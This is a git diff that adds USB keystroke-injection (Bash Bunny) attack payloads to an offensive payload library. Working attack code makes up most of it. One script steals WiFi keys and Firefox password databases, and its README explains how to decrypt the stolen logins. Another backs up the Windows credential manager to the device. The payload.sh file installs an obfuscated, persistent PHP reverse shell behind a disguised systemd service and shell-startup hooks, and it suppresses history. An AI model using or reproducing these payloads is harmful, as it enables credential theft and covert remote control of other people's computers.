diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash +# Title: KeyManager Backup +# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target on: Windows 10 +# Attackmodes: HID & STORAGE +# Extensions: Run +# Props: Paranoid Ninja + +####################### Config ####################### +password=lamepassword +##################### End Config ##################### + +LED SETUP + +ATTACKMODE HID STORAGE + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr" +QUACK DELAY 200 +# button: Backup up... +QUACK ALT b +QUACK DELAY 200 +# button: Browse... +QUACK ALT b +# file name +QUACK STRING "backup" +# select task bar +QUACK ALT d +QUACK DELAY 200 +# look for bunny +QUACK STRING "BashBunny" +QUACK DELAY 600 +#select drive +QUACK DOWNARROW +# add loot folder +QUACK STRING "/loot" +QUACK ENTER +QUACK DELAY 200 +# button: Save +QUACK ALT s +QUACK DELAY 200 +# button: Next +QUACK ALT n +QUACK DELAY 200 +# note: keycroc you can uses CTRL-ALT-DELETE +QUACK CTRL-ALT DELETE +QUACK DELAY 200 +QUACK STRING "$password" +QUACK TAB +QUACK STRING "$password" +# button: Next +QUACK ALT n +QUACK DELAY 300 +# button: Finish +QUACK ALT f +QUACK DELAY 200 +# button: Close +QUACK ALT c + +LED FINISH + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md new file mode 100644 index 00000000..89c5fdbd --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md @@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index fe1bcb23..ac8ccd9f 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -24,18 +24,18 @@ Install dependencies, if needed: - NetPacket::ICMP Disable ICMP replies by the OS: - *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start Bunny.pl -> perl Bunny.pl # !!!Insert the IP of your attacking machine into PingZhell.ps1!!! # -Plug in Bashbunny with PingZhellBunny equipped. -Achieve reverse shell. -run away <3 +

Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+ run away <3

Credit for code and ideas: - bdamele -- nishang +- samratashok - krabelize diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md new file mode 100644 index 00000000..e8ea4c13 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/README.md @@ -0,0 +1,36 @@ +## About: +* Title: persistentReverseBunny +* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Remote Access +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, STORAGE + +## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs. + +### Workflow: +Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell. + +### Algorithm: +1. Stop storing history, this helps to keep tracks clear from begining. +2. Creating reverse shell. +3. Creating non-root systemd service. +4. Enabling service. +5. Starting service on trigger of firing terminal emulator/shell. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| ----------------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| persistentReverseBunny/ | /payloads/libray/ | + +### Note: +* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`. +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt new file mode 100644 index 00000000..de367d14 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt @@ -0,0 +1,51 @@ +# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Remote Access +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh new file mode 100644 index 00000000..edd304f3 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system/ +echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop +cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/ +chmod +x /var/tmp/.system/shc +/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +rm /var/tmp/.system/pop* +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 00000000..8e7c686c Binary files /dev/null and b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc differ